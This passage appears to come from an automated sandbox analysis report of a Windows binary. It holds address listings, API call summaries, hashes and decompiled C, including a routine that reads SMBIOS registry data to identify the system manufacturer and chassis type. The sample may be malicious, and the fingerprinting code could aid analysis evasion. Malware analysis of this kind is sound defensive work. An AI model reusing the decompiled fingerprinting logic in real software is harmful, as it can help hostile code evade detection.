                                                                    0x00e84cb2
                                                                    0x00e84cb5
                                                                    0x00e84cf4
                                                                    0x00e84cf4
                                                                    0x00e84cf8
                                                                    0x00e84dc5
                                                                    0x00e84dcb
                                                                    0x00e84dce
                                                                    0x00e84e1f
                                                                    0x00e84e1f
                                                                    0x00000000
                                                                    0x00e84e1f
                                                                    0x00e84dd0
                                                                    0x00e84dda
                                                                    0x00e84ddf
                                                                    0x00e84de1
                                                                    0x00e84de3
                                                                    0x00e84de4
                                                                    0x00e84de5
                                                                    0x00e84de9
                                                                    0x00e84dee
                                                                    0x00e84df4
                                                                    0x00e84e07
                                                                    0x00e84e13
                                                                    0x00e84e15
                                                                    0x00e84e18
                                                                    0x00e84db3
                                                                    0x00e84db3
                                                                    0x00000000
                                                                    0x00e84db3
                                                                    0x00000000
                                                                    0x00e84e1a
                                                                    0x00e84cfe
                                                                    0x00e84d03
                                                                    0x00e84d08
                                                                    0x00e84d0b
                                                                    0x00e84d0d
                                                                    0x00e84d1d
                                                                    0x00e84d23
                                                                    0x00e84d26
                                                                    0x00e84d29
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84d38
                                                                    0x00e84d46
                                                                    0x00e84d4b
                                                                    0x00e84d4e
                                                                    0x00e84d50
                                                                    0x00e84d54
                                                                    0x00e84d66
                                                                    0x00e84d6c
                                                                    0x00e84d6e
                                                                    0x00e84d6e
                                                                    0x00e84d77
                                                                    0x00e84d7e
                                                                    0x00e84d83
                                                                    0x00e84d89
                                                                    0x00e84d9c
                                                                    0x00e84da8
                                                                    0x00e84daa
                                                                    0x00e84dad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84dad
                                                                    0x00e84cb7
                                                                    0x00e84cb9
                                                                    0x00e84cbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84cc1
                                                                    0x00e84cc4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84cc9
                                                                    0x00e84ccc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84cd2
                                                                    0x00e84cd5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84cda
                                                                    0x00e84cdd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84ce3
                                                                    0x00e84ce6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84ceb
                                                                    0x00e84cee
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84ca1
                                                                    0x00e84ca1
                                                                    0x00e84ca3
                                                                    0x00e84ca5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84ca7
                                                                    0x00e84caa
                                                                    0x00e84cad
                                                                    0x00e84cad
                                                                    0x00e84cb0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84cb0
                                                                    0x00000000
                                                                    0x00e84e2b
                                                                    0x00e84e2b
                                                                    0x00e84e2e
                                                                    0x00e84e2e
                                                                    0x00000000
                                                                    0x00e84c70
                                                                    0x00e84bcb
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 00E840D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5,00000000,00E84B93,A6ABE2D4,?,00000000), ref: 00E84100
                                                                      • Part of subcall function 00E840D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8411B
                                                                      • Part of subcall function 00E840D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00EE22E5), ref: 00E8413B
                                                                      • Part of subcall function 00E840D0: CreateThread.KERNELBASE ref: 00E84159
                                                                    • CreateFileW.KERNEL32(?,0012019F,00000000,00000000,00000003,00000000,00000000,A6ABE2D4,?,00000000), ref: 00E84BB7
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E84BCB
                                                                    • _wcschr.LIBVCRUNTIME ref: 00E84C15
                                                                    • _wcschr.LIBVCRUNTIME ref: 00E84C20
                                                                    • CreateFileW.KERNEL32(?,0012019F,00000000,00000000,00000003,00000000,00000000,A6ABE2D4,?,00000000), ref: 00E84E4A
                                                                    • SetEvent.KERNEL32(?), ref: 00E84E67
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E84E72
                                                                    • CloseHandle.KERNEL32(?), ref: 00E84E7B
                                                                    • CloseHandle.KERNEL32(?), ref: 00E84E84
                                                                    • CloseHandle.KERNEL32(?), ref: 00E84E8D
                                                                    • CloseHandle.KERNEL32(?), ref: 00E84E96
                                                                    • Sleep.KERNEL32(00000050), ref: 00E84EB2
                                                                    • SetEvent.KERNEL32(?), ref: 00E84FA7
                                                                    • WaitForSingleObject.KERNEL32(?,00000514), ref: 00E84FB5
                                                                    • NtTerminateThread.NTDLL ref: 00E84FDC
                                                                    • CloseHandle.KERNEL32(?), ref: 00E84FE1
                                                                    • CreateThread.KERNEL32 ref: 00E85004
                                                                    • ResetEvent.KERNEL32(?), ref: 00E85014
                                                                    • ResetEvent.KERNEL32(?), ref: 00E8501D
                                                                    • SetEvent.KERNEL32(?), ref: 00E85176
                                                                    • WaitForSingleObject.KERNEL32(?,00000514), ref: 00E85184
                                                                    • NtTerminateThread.NTDLL ref: 00E851AB
                                                                    • CloseHandle.KERNEL32(?), ref: 00E851B0
                                                                    • CreateThread.KERNEL32 ref: 00E851D4
                                                                    • ResetEvent.KERNEL32(?), ref: 00E851E4
                                                                    • ResetEvent.KERNEL32(?), ref: 00E851ED
                                                                    • SetEvent.KERNEL32(?), ref: 00E853C9
                                                                    • WaitForSingleObject.KERNEL32(?,00000514), ref: 00E853D7
                                                                    • NtTerminateThread.NTDLL ref: 00E853FE
                                                                    • CloseHandle.KERNEL32(?), ref: 00E85403
                                                                    • CreateThread.KERNEL32 ref: 00E85424
                                                                    • ResetEvent.KERNEL32(?), ref: 00E85434
                                                                    • ResetEvent.KERNEL32(?), ref: 00E8543D
                                                                    • EnumProcesses.PSAPI(00000000,00000320,00000000), ref: 00E85573
                                                                    • EnumProcesses.PSAPI(00000000,00000000,00000000), ref: 00E85599
                                                                      • Part of subcall function 00E84170: SetEvent.KERNEL32(?,A6ABE2D4,00000000,00000000,Function_00074DD0,000000FF,?,00E8569B), ref: 00E84198
                                                                      • Part of subcall function 00E84170: WaitForSingleObject.KERNEL32(?,000000FF,?,00E8569B), ref: 00E841A3
                                                                      • Part of subcall function 00E84170: CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841AC
                                                                      • Part of subcall function 00E84170: CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841B5
                                                                      • Part of subcall function 00E84170: CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841BE
                                                                      • Part of subcall function 00E84170: CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Event$CloseHandle$Create$Thread$Reset$ObjectSingleWait$Terminate$EnumFileProcesses_wcschr$Sleep
                                                                    • String ID: UNC$c:\windows\
                                                                    • API String ID: 1060652738-1809659413
                                                                    • Opcode ID: 2ae77705638227f5b71b2cb0faa5d6de3d161a119b4ae754e4147b9b9477b5ea
                                                                    • Instruction ID: 91f365be645564ca9e3007755f6ebd67677df2a09fbe078fc235c49586a498f5
                                                                    • Opcode Fuzzy Hash: 2ae77705638227f5b71b2cb0faa5d6de3d161a119b4ae754e4147b9b9477b5ea
                                                                    • Instruction Fuzzy Hash: BF629971D002189FDB219FA4CC49BDDBBB1FB09304F1441AAE94DBB291DB716A86CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E00E890C0(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                    				signed int _v8;
                                                                    				int _v12;
                                                                    				void* _v16;
                                                                    				int _v20;
                                                                    				int _v24;
                                                                    				long _v28;
                                                                    				intOrPtr _v32;
                                                                    				int _v36;
                                                                    				CHAR* _v40;
                                                                    				intOrPtr _v44;
                                                                    				void* _v48;
                                                                    				intOrPtr* _v52;
                                                                    				intOrPtr _v56;
                                                                    				signed int _t74;
                                                                    				long _t77;
                                                                    				long _t80;
                                                                    				void* _t85;
                                                                    				intOrPtr _t87;
                                                                    				char _t88;
                                                                    				char _t89;
                                                                    				intOrPtr _t90;
                                                                    				int _t94;
                                                                    				signed int _t96;
                                                                    				void* _t105;
                                                                    				int _t114;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr* _t120;
                                                                    				CHAR* _t121;
                                                                    				int _t125;
                                                                    				char* _t126;
                                                                    				CHAR* _t128;
                                                                    				CHAR* _t129;
                                                                    				char* _t132;
                                                                    				void* _t134;
                                                                    				void* _t135;
                                                                    				signed int _t136;
                                                                    				void* _t137;
                                                                    
                                                                    				_t74 =  *0xeef074; // 0xa6abe2d4
                                                                    				_v8 = _t74 ^ _t136;
                                                                    				_v40 = __ecx;
                                                                    				_t132 = 0;
                                                                    				_v48 = 0;
                                                                    				_v24 = 0;
                                                                    				_v32 = 0x80;
                                                                    				_t128 = 0;
                                                                    				_v12 = 0;
                                                                    				_v20 = 0;
                                                                    				_v36 = 0;
                                                                    				_t77 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data", 0, 1,  &_v16);
                                                                    				if(_t77 == 0) {
                                                                    					_t80 = RegQueryValueExW(_v16, L"SMBiosData", 0,  &_v12, 0,  &_v20);
                                                                    					_v28 = _t80;
                                                                    					if(_t80 != 0) {
                                                                    						L8:
                                                                    						RegCloseKey(_v16);
                                                                    						if(_v28 == _t128) {
                                                                    							_t125 = _v24;
                                                                    							_t134 = ( *(_t125 + 6) & 0x0000ffff) + 8;
                                                                    							_t119 = ( *(_t125 + 4) & 0x0000ffff) + 8;
                                                                    							_v44 = _t119;
                                                                    							_t85 = _t134 + _t125;
                                                                    							if( *((char*)(_t134 + _t125)) != 0x7f) {
                                                                    								while(_t134 < _t119) {
                                                                    									_t120 = _t125 + _t134;
                                                                    									_t135 = _t134 + ( *(_t85 + 1) & 0x000000ff);
                                                                    									_v52 = _t120;
                                                                    									_t114 = 1;
                                                                    									do {
                                                                    										_t87 =  *_t120;
                                                                    										if(_t87 != 1) {
                                                                    											if(_t87 != 2) {
                                                                    												if(_t87 != 3 || _t114 != 1) {
                                                                    													goto L27;
                                                                    												} else {
                                                                    													_t96 = ( *(_t120 + 5) & 0x000000ff) + 0xfffffffe;
                                                                    													if(_t96 > 0xc) {
                                                                    														L57:
                                                                    														_t128 = "(Other)";
                                                                    														goto L28;
                                                                    													} else {
                                                                    														switch( *((intOrPtr*)(_t96 * 4 +  &M00E893A8))) {
                                                                    															case 0:
                                                                    																_t128 = "(Unknown)";
                                                                    																goto L28;
                                                                    															case 1:
                                                                    																goto L28;
                                                                    															case 2:
                                                                    																goto L28;
                                                                    															case 3:
                                                                    																goto L57;
                                                                    															case 4:
                                                                    																goto L28;
                                                                    															case 5:
                                                                    																goto L28;
                                                                    															case 6:
                                                                    																goto L28;
                                                                    															case 7:
                                                                    																goto L28;
                                                                    															case 8:
                                                                    																goto L28;
                                                                    															case 9:
                                                                    																goto L28;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    												goto L58;
                                                                    											} else {
                                                                    												if(_v36 == 1 && (( *(_t120 + 4) & 0x000000ff) == _t114 || ( *(_t120 + 5) & 0x000000ff) == _t114 || ( *(_t120 + 6) & 0x000000ff) == _t114)) {
                                                                    													_t128 = _t135 + _t125;
                                                                    												}
                                                                    												goto L27;
                                                                    											}
                                                                    										} else {
                                                                    											if(_v36 != 0 || ( *(_t120 + 4) & 0x000000ff) != _t114 && ( *(_t120 + 5) & 0x000000ff) != _t114 && ( *(_t120 + 6) & 0x000000ff) != _t114) {
                                                                    												L27:
                                                                    												if(_t128 != 0) {
                                                                    													L28:
                                                                    													_t121 = _t128;
                                                                    													_t49 =  &(_t121[1]); // 0x1
                                                                    													_t126 = _t49;
                                                                    													do {
                                                                    														_t89 =  *_t121;
                                                                    														_t121 =  &(_t121[1]);
                                                                    													} while (_t89 != 0);
                                                                    													_t50 = _t121 - _t126 + 1; // 0x2
                                                                    													_t90 = _t50;
                                                                    													_v56 = _t90;
                                                                    													if(_v32 > _t90 + 1) {
                                                                    														_t129 = _v40;
                                                                    														_t94 = wsprintfA(_t129, "%s ", _t128);
                                                                    														_t137 = _t137 + 0xc;
                                                                    														_v40 =  &(_t129[_t94]);
                                                                    													}
                                                                    													_v32 = _v32 - _v56;
                                                                    													goto L33;
                                                                    												}
                                                                    											} else {
                                                                    												_t128 = _t135 + _t125;
                                                                    												if(lstrcmpiA(_t128, "System manufacturer") != 0) {
                                                                    													goto L27;
                                                                    												} else {
                                                                    													_v36 = 1;
                                                                    													L33:
                                                                    													_t128 = 0;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										_t125 = _v24;
                                                                    										_t114 = _t114 + 1;
                                                                    										do {
                                                                    											_t88 =  *(_t135 + _t125);
                                                                    											_t135 = _t135 + 1;
                                                                    										} while (_t88 != 0);
                                                                    										if( *(_t135 + _t125) != _t88) {
                                                                    											goto L37;
                                                                    										}
                                                                    										break;
                                                                    										L37:
                                                                    										_t120 = _v52;
                                                                    									} while (_t135 < _v44);
                                                                    									_t119 = _v44;
                                                                    									_t134 = _t135 + 1;
                                                                    									_t85 = _t134 + _t125;
                                                                    									if( *((char*)(_t134 + _t125)) != 0x7f) {
                                                                    										continue;
                                                                    									}
                                                                    									break;
                                                                    								}
                                                                    							}
                                                                    							_t132 = _v24;
                                                                    						}
                                                                    						if(_t132 != 0) {
                                                                    							HeapFree(_v48, 0, _t132);
                                                                    						}
                                                                    					} else {
                                                                    						if(_v20 == 0 || _v12 != 3) {
                                                                    							_v28 = 0x3f2;
                                                                    							RegCloseKey(_v16);
                                                                    						} else {
                                                                    							_t105 = GetProcessHeap();
                                                                    							_v48 = _t105;
                                                                    							_t132 = HeapAlloc(_t105, 0, _v20);
                                                                    							_v24 = _t132;
                                                                    							if(_t132 != 0) {
                                                                    								_v28 = RegQueryValueExW(_v16, L"SMBiosData", 0, 0, _t132,  &_v20);
                                                                    								goto L8;
                                                                    							} else {
                                                                    								_v28 = 8;
                                                                    								RegCloseKey(_v16);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					SetLastError(_v28);
                                                                    					return E00EA7663(_v8 ^ _t136);
                                                                    				} else {
                                                                    					SetLastError(_t77);
                                                                    					return E00EA7663(_v8 ^ _t136);
                                                                    				}
                                                                    				L58:
                                                                    			}








































                                                                    0x00e890c6
                                                                    0x00e890cd
                                                                    0x00e890d6
                                                                    0x00e890da
                                                                    0x00e890dc
                                                                    0x00e890f0
                                                                    0x00e890f8
                                                                    0x00e890fb
                                                                    0x00e890fd
                                                                    0x00e89100
                                                                    0x00e89103
                                                                    0x00e89106
                                                                    0x00e8910e
                                                                    0x00e8913e
                                                                    0x00e89144
                                                                    0x00e89149
                                                                    0x00e891ab
                                                                    0x00e891ae
                                                                    0x00e891b7
                                                                    0x00e891bd
                                                                    0x00e891c8
                                                                    0x00e891cb
                                                                    0x00e891d2
                                                                    0x00e891d5
                                                                    0x00e891d8
                                                                    0x00e891e0
                                                                    0x00e891ec
                                                                    0x00e891ef
                                                                    0x00e891f1
                                                                    0x00e891f4
                                                                    0x00e89200
                                                                    0x00e89200
                                                                    0x00e89204
                                                                    0x00e89257
                                                                    0x00e89321
                                                                    0x00000000
                                                                    0x00e89330
                                                                    0x00e89334
                                                                    0x00e8933a
                                                                    0x00e8939d
                                                                    0x00e8939d
                                                                    0x00000000
                                                                    0x00e8933c
                                                                    0x00e8933c
                                                                    0x00000000
                                                                    0x00e89343
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e8933c
                                                                    0x00e8933a
                                                                    0x00000000
                                                                    0x00e8925d
                                                                    0x00e89261
                                                                    0x00e8927b
                                                                    0x00e8927b
                                                                    0x00000000
                                                                    0x00e89261
                                                                    0x00e89206
                                                                    0x00e8920a
                                                                    0x00e8927e
                                                                    0x00e89280
                                                                    0x00e89282
                                                                    0x00e89282
                                                                    0x00e89284
                                                                    0x00e89284
                                                                    0x00e89287
                                                                    0x00e89287
                                                                    0x00e89289
                                                                    0x00e8928a
                                                                    0x00e89290
                                                                    0x00e89290
                                                                    0x00e89293
                                                                    0x00e8929a
                                                                    0x00e8929d
                                                                    0x00e892a6
                                                                    0x00e892ac
                                                                    0x00e892b1
                                                                    0x00e892b1
                                                                    0x00e892ba
                                                                    0x00000000
                                                                    0x00e892ba
                                                                    0x00e89224
                                                                    0x00e89224
                                                                    0x00e89235
                                                                    0x00000000
                                                                    0x00e89237
                                                                    0x00e89237
                                                                    0x00e892bd
                                                                    0x00e892bd
                                                                    0x00e892bd
                                                                    0x00e89235
                                                                    0x00e8920a
                                                                    0x00e892bf
                                                                    0x00e892c2
                                                                    0x00e892c3
                                                                    0x00e892c3
                                                                    0x00e892c6
                                                                    0x00e892c7
                                                                    0x00e892ce
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e892d0
                                                                    0x00e892d0
                                                                    0x00e892d3
                                                                    0x00e892dc
                                                                    0x00e892df
                                                                    0x00e892e4
                                                                    0x00e892e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e892e7
                                                                    0x00e892ed
                                                                    0x00e892f0
                                                                    0x00e892f0
                                                                    0x00e892f5
                                                                    0x00e892fd
                                                                    0x00e892fd
                                                                    0x00e8914b
                                                                    0x00e8914e
                                                                    0x00e89243
                                                                    0x00e8924a
                                                                    0x00e8915e
                                                                    0x00e8915e
                                                                    0x00e89167
                                                                    0x00e89173
                                                                    0x00e89175
                                                                    0x00e8917a
                                                                    0x00e891a8
                                                                    0x00000000
                                                                    0x00e8917c
                                                                    0x00e8917f
                                                                    0x00e89186
                                                                    0x00e89186
                                                                    0x00e8917a
                                                                    0x00e8914e
                                                                    0x00e89306
                                                                    0x00e8931e
                                                                    0x00e89110
                                                                    0x00e89111
                                                                    0x00e89129
                                                                    0x00e89129
                                                                    0x00000000

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Services\mssmbios\Data,00000000,00000001,A6ABE2D4,?,00000001), ref: 00E89106
                                                                    • SetLastError.KERNEL32(00000000), ref: 00E89111
                                                                    • RegQueryValueExW.ADVAPI32(A6ABE2D4,SMBiosData,00000000,00000000,00000000,00000001), ref: 00E8913E
                                                                    • GetProcessHeap.KERNEL32 ref: 00E8915E
                                                                    • HeapAlloc.KERNEL32(00000000,00000000,00000001), ref: 00E8916D
                                                                    • RegCloseKey.ADVAPI32(A6ABE2D4), ref: 00E89186
                                                                    • SetLastError.KERNEL32(00E89877), ref: 00E89306
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorHeapLast$AllocCloseOpenProcessQueryValue
                                                                    • String ID: %s $(Desktop)$(Laptop)$(Low Profile Desktop)$(Mini Tower)$(Notebook)$(Other)$(Portable)$(Sub Notebook)$(Tower)$(Unknown)$SMBiosData$SYSTEM\CurrentControlSet\Services\mssmbios\Data$System manufacturer
                                                                    • API String ID: 1958120126-2478689233
                                                                    • Opcode ID: 9429a0157b1458c308d1568623c9e9ed40b0b4a7f131ef30cd1110990b4eb52f
                                                                    • Instruction ID: dc9ea919871dbbd826dac164f886aec329a998a9fc3397b45aeb427c81060494
                                                                    • Opcode Fuzzy Hash: 9429a0157b1458c308d1568623c9e9ed40b0b4a7f131ef30cd1110990b4eb52f
                                                                    • Instruction Fuzzy Hash: 15810771D04259EFCF109F95AC45AFDBBB5FB45305F28106AE84EB7162C3329906CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 55%
                                                                    			E00E6B3D0(intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _v8;
                                                                    				long _v16;
                                                                    				char _v24;
                                                                    				signed int _v32;
                                                                    				long _v36;
                                                                    				intOrPtr _v40;
                                                                    				char _v42;
                                                                    				short _v44;
                                                                    				intOrPtr _v48;
                                                                    				signed int _v52;
                                                                    				char _v56;
                                                                    				char _v58;
                                                                    				short _v60;
                                                                    				intOrPtr _v64;
                                                                    				char _v68;
                                                                    				char _v72;
                                                                    				char _v76;
                                                                    				struct _SECURITY_ATTRIBUTES* _v80;
                                                                    				struct _SECURITY_ATTRIBUTES* _v84;
                                                                    				char _v96;
                                                                    				char _v100;
                                                                    				signed int _v101;
                                                                    				struct _SECURITY_ATTRIBUTES* _v104;
                                                                    				struct _SECURITY_ATTRIBUTES* _v108;
                                                                    				char _v124;
                                                                    				struct _SECURITY_ATTRIBUTES* _v128;
                                                                    				signed char _v132;
                                                                    				struct _SECURITY_ATTRIBUTES* _v136;
                                                                    				struct _SECURITY_ATTRIBUTES* _v140;
                                                                    				char _v148;
                                                                    				char _v152;
                                                                    				signed int _v153;
                                                                    				char _v156;
                                                                    				struct _SECURITY_ATTRIBUTES* _v160;
                                                                    				struct _SECURITY_ATTRIBUTES* _v164;
                                                                    				intOrPtr _v168;
                                                                    				char _v172;
                                                                    				char _v180;
                                                                    				signed char _v184;
                                                                    				struct _SECURITY_ATTRIBUTES* _v188;
                                                                    				char _v204;
                                                                    				struct _SECURITY_ATTRIBUTES* _v208;
                                                                    				struct _SECURITY_ATTRIBUTES* _v212;
                                                                    				char _v216;
                                                                    				intOrPtr _v220;
                                                                    				char _v224;
                                                                    				void* _v228;
                                                                    				signed char _v229;
                                                                    				signed char _v260;
                                                                    				char _v292;
                                                                    				intOrPtr _v296;
                                                                    				char _v300;
                                                                    				intOrPtr _v368;
                                                                    				char _v372;
                                                                    				struct _SECURITY_ATTRIBUTES* _v380;
                                                                    				char _v420;
                                                                    				struct _SECURITY_ATTRIBUTES* _v424;
                                                                    				char _v428;
                                                                    				char _v472;
                                                                    				long _v476;
                                                                    				signed int _v480;
                                                                    				struct _SECURITY_ATTRIBUTES* _v484;
                                                                    				char _v488;
                                                                    				char _v596;
                                                                    				intOrPtr _v832;
                                                                    				signed int _v844;
                                                                    				struct _SECURITY_ATTRIBUTES* _v852;
                                                                    				struct _SECURITY_ATTRIBUTES* _v856;
                                                                    				char _v888;
                                                                    				char _v1180;
                                                                    				signed int _v1184;
                                                                    				void* _v1188;
                                                                    				void* _v1192;
                                                                    				intOrPtr _v1196;
                                                                    				void* _v1200;
                                                                    				signed int _v1204;
                                                                    				intOrPtr* _v1208;
                                                                    				intOrPtr* _v1216;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1224;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1228;
                                                                    				char _v1244;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1248;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1252;
                                                                    				char _v1268;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1272;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1276;
                                                                    				char _v1292;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1312;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1316;
                                                                    				char _v1332;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1336;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1340;
                                                                    				char _v1356;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1360;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1364;
                                                                    				char _v1380;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1384;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1388;
                                                                    				char _v1404;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1408;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1412;
                                                                    				char _v1428;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1432;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1436;
                                                                    				char _v1452;
                                                                    				char _v1476;
                                                                    				intOrPtr _v1500;
                                                                    				intOrPtr _v1508;
                                                                    				char _v1516;
                                                                    				signed int _v1524;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1560;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1564;
                                                                    				short _v1580;
                                                                    				intOrPtr _v1936;
                                                                    				char _v1952;
                                                                    				signed int _v1960;
                                                                    				struct _SECURITY_ATTRIBUTES* _v2384;
                                                                    				void* __ebx;
                                                                    				void* __ebp;
                                                                    				signed int _t485;
                                                                    				void* _t491;
                                                                    				struct _SECURITY_ATTRIBUTES* _t495;
                                                                    				intOrPtr _t507;
                                                                    				void* _t510;
                                                                    				void* _t512;
                                                                    				char* _t516;
                                                                    				signed int _t518;
                                                                    				void* _t522;
                                                                    				signed int _t525;
                                                                    				signed int _t526;
                                                                    				signed int _t536;
                                                                    				signed int _t537;
                                                                    				signed int _t542;
                                                                    				signed int _t545;
                                                                    				signed int _t546;
                                                                    				signed int _t548;
                                                                    				signed int _t549;
                                                                    				signed int _t550;
                                                                    				signed int _t554;
                                                                    				signed int _t555;
                                                                    				intOrPtr _t560;
                                                                    				void* _t564;
                                                                    				short* _t565;
                                                                    				WCHAR* _t582;
                                                                    				WCHAR* _t585;
                                                                    				WCHAR* _t588;
                                                                    				signed int _t595;
                                                                    				void* _t597;
                                                                    				intOrPtr _t602;
                                                                    				intOrPtr _t606;
                                                                    				signed int _t618;
                                                                    				signed int _t619;
                                                                    				char* _t622;
                                                                    				char* _t633;
                                                                    				char* _t635;
                                                                    				char* _t637;
                                                                    				signed int _t653;
                                                                    				intOrPtr* _t658;
                                                                    				void* _t659;
                                                                    				char* _t660;
                                                                    				char* _t661;
                                                                    				char* _t664;
                                                                    				char* _t665;
                                                                    				char* _t668;
                                                                    				char* _t669;
                                                                    				char* _t672;
                                                                    				intOrPtr* _t686;
                                                                    				void* _t694;
                                                                    				void* _t701;
                                                                    				void* _t705;
                                                                    				intOrPtr* _t713;
                                                                    				void* _t724;
                                                                    				signed char _t725;
                                                                    				void* _t728;
                                                                    				void* _t729;
                                                                    				void* _t730;
                                                                    				char* _t733;
                                                                    				struct _SECURITY_ATTRIBUTES* _t735;
                                                                    				char _t738;
                                                                    				intOrPtr _t744;
                                                                    				intOrPtr* _t754;
                                                                    				signed char _t755;
                                                                    				signed char _t758;
                                                                    				DWORD* _t783;
                                                                    				signed int _t787;
                                                                    				signed int _t793;
                                                                    				void* _t795;
                                                                    				struct _SECURITY_ATTRIBUTES* _t796;
                                                                    				struct _SECURITY_ATTRIBUTES* _t797;
                                                                    				signed int _t810;
                                                                    				intOrPtr _t833;
                                                                    				struct _SECURITY_ATTRIBUTES* _t840;
                                                                    				char _t843;
                                                                    				intOrPtr _t847;
                                                                    				signed char _t853;
                                                                    				char* _t864;
                                                                    				signed int _t873;
                                                                    				intOrPtr* _t885;
                                                                    				intOrPtr _t886;
                                                                    				void* _t887;
                                                                    				intOrPtr _t893;
                                                                    				void* _t894;
                                                                    				char _t898;
                                                                    				void* _t899;
                                                                    				long _t900;
                                                                    				void* _t912;
                                                                    				void* _t914;
                                                                    				signed int _t917;
                                                                    				signed int _t919;
                                                                    				signed int _t921;
                                                                    				void* _t924;
                                                                    				signed int _t927;
                                                                    				void* _t929;
                                                                    				void* _t930;
                                                                    				void* _t931;
                                                                    				void* _t933;
                                                                    				void* _t934;
                                                                    				signed int _t937;
                                                                    				void* _t938;
                                                                    				void* _t939;
                                                                    				void* _t941;
                                                                    				signed int _t944;
                                                                    				void* _t945;
                                                                    				void* _t946;
                                                                    				void* _t951;
                                                                    				void* _t963;
                                                                    				void* _t969;
                                                                    				void* _t971;
                                                                    				void* _t973;
                                                                    				void* _t974;
                                                                    				void* _t976;
                                                                    
                                                                    				_t728 = _t924;
                                                                    				_t927 = (_t924 - 0x00000008 & 0xfffffff8) + 4;
                                                                    				_v8 =  *((intOrPtr*)(_t728 + 4));
                                                                    				_t917 = _t927;
                                                                    				_push(0xffffffff);
